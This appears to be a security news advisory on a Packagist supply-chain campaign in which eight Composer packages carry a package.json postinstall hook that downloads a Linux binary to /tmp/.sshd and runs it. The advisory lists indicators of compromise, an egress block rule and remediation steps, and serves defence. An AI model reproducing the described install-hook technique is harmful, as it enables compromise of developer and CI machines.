Last updated: July 5, 2026 at 9:01 AM UTC
All 557 Vulnerability 199 Breach 106 Threat 245 Defense 7
Tag: packagist (1 article)Clear

Packagist supply-chain attack hits 8 Composer packages with cross-ecosystem package.json hook downloading Linux binary to /tmp/.sshd

Socket has detailed a coordinated supply-chain campaign that planted malicious code in eight Composer packages on Packagist, including moritz-sauer-13/silverstripe-cms-theme, crosiersource/crosierlib-base, devdojo/wave, devdojo/genesis, katanaui/katana, elitedevsquad/sidecar-laravel, r2luna/brain, and baskarcm/tzi-chat-ui. The attackers placed the payload not in composer.json but in package.json - meaning teams scanning only PHP dependencies would miss the Node.js lifecycle hook bundled inside. The postinstall script downloads a Linux binary from a GitHub Releases URL (github[.]com/parikhpreyash4/systemd-network-helper-aa5c751f), saves it as /tmp/.sshd, and runs it backgrounded with execute permissions. Socket found the same payload referenced in 777 GitHub files, including two GitHub Actions workflows - hinting at a broader campaign.

Check
Audit composer.lock and package.json across PHP projects for the 8 affected packages installed since 2026-05-20. Block egress to github[.]com/parikhpreyash4/* and check /tmp/.sshd presence on Linux build hosts.
Affected
Any project that installed moritz-sauer-13/silverstripe-cms-theme, crosiersource/crosierlib-base, devdojo/wave, devdojo/genesis, katanaui/katana, elitedevsquad/sidecar-laravel, r2luna/brain, or baskarcm/tzi-chat-ui via Composer. Hidden in package.json so PHP-only scanners miss it.
Fix
Roll affected packages back to clean versions; pin via composer.lock and package-lock.json. Rotate developer and CI credentials reachable from affected hosts. Scan PHP repos for package.json lifecycle hooks.